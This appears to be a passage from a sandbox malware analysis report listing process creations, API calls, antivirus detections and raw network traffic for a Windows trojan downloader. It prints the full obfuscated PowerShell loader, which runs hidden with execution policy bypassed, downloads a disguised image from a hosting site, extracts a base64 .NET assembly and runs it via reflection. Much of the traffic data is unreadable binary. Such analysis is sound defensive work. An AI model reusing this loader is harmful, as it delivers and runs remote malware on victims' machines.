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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000580
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2240
thread_handle: 0x0000044c
process_identifier: 2236
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.VBS.SAgent.gen
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received We;n˜œæÐUÓ(©sšÍÓ'pÙMDOWNGRD g@Z8^tßK²ÜÖo`sÎ-çïëØ¡súCéÀ ÿ 
Data received Q
Data received ‘
Data received AΑWüT7×ÂI’\œ¹]h*ÆUŠ•R[üÇubBT-ï¤Ó¶.½ã[4ðçmÿ¤O‡Ï_V–éÀ˖`D"HqF0D D5£ ;¥Œx™2H”)!*t]Dÿe© K÷G¤3s± 3±Æ}„>¹!]]w|ä¨úHe„W.v–U–Œ"
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received X­ä¡Ä!K,Ò6¥ÌT΄#µŸ³Èà‹3Ëzÿ ØÄFeH„LE¦ú‡lA.3ž¡=
Data sent yue;nlµZM•¹öZÆv¥´ۗŸnîoWøÈUHë/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAv€¦º€Mƒ­c·Á¦¹’ƍÍݧ±}eˆùן6kÅ_¯”ŠéwA4æiƒ„—æéò„jHá 8Í0¥wO5°pÖh4E*C,ëèw‹S˜5ߎpþdÞ>Àû.xAO.²W0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 185.196.8.176
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge;n :‹é:ý×°‹ÈúŠ£² ¬ÄRò@è!Ÿ@z/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

 buffer: FBA6w} ¬+í)TiTo˃¸4,èër§'"²ëOÚäèƹ›¬ÁÀŒ ;’qO Ø "Š®ug„]0aü¥×¾Ãê÷E‰\J§RW}î‹Ë†P„WÙìõú3t$}şºè\¯Í¯
socket: 968
0 0

WSASend

 buffer: Àz—Õ 6è)îtǽ—êÀa$Ðv¥ÌÒ&YøIظ(f<üěé5„û®Ó‡NO`¸s¸{pÎ,û^¢É\+õöÎL" 2^m©#. “ÓA§þõœÉRåI5Ž¼k ͛Dý3Þ\É$¢~904ärx¯~å´Ô=•½ŠW¢oÏ>¥ñŒN_ŽLÁ^;´qBÀïpùÌÀP‰ÄڞYûRÁg´MúuˆÈ²¼F²!…ÅmÃäù¼øÉ·I„žž
socket: 968
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
Time & API Arguments Status Return Repeated

WSASend

 buffer: kge;n :‹é:ý×°‹ÈúŠ£² ¬ÄRò@è!Ÿ@z/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 968
0 0

WSASend

 buffer: FBA6w} ¬+í)TiTo˃¸4,èër§'"²ëOÚäèƹ›¬ÁÀŒ ;’qO Ø "Š®ug„]0aü¥×¾Ãê÷E‰\J§RW}î‹Ë†P„WÙìõú3t$}şºè\¯Í¯
socket: 968
0 0

WSASend

 buffer: Àz—Õ 6è)îtǽ—êÀa$Ðv¥ÌÒ&YøIظ(f<üěé5„û®Ó‡NO`¸s¸{pÎ,û^¢É\+õöÎL" 2^m©#. “ÓA§þõœÉRåI5Ž¼k ͛Dý3Þ\É$¢~904ärx¯~å´Ô=•½ŠW¢oÏ>¥ñŒN_ŽLÁ^;´qBÀïpùÌÀP‰ÄڞYûRÁg´MúuˆÈ²¼F²!…ÅmÃäù¼øÉ·I„žž
socket: 968
0 0

send

 buffer: yue;nlµZM•¹öZÆv¥´ۗŸnîoWøÈUHë/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1440
sent: 126
1 126 0

send

 buffer: FBAv€¦º€Mƒ­c·Á¦¹’ƍÍݧ±}eˆùן6kÅ_¯”ŠéwA4æiƒ„—æéò„jHá 8Í0¥wO5°pÖh4E*C,ëèw‹S˜5ߎpþdÞ>Àû.xAO.²W0
socket: 1440
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2016
0 0
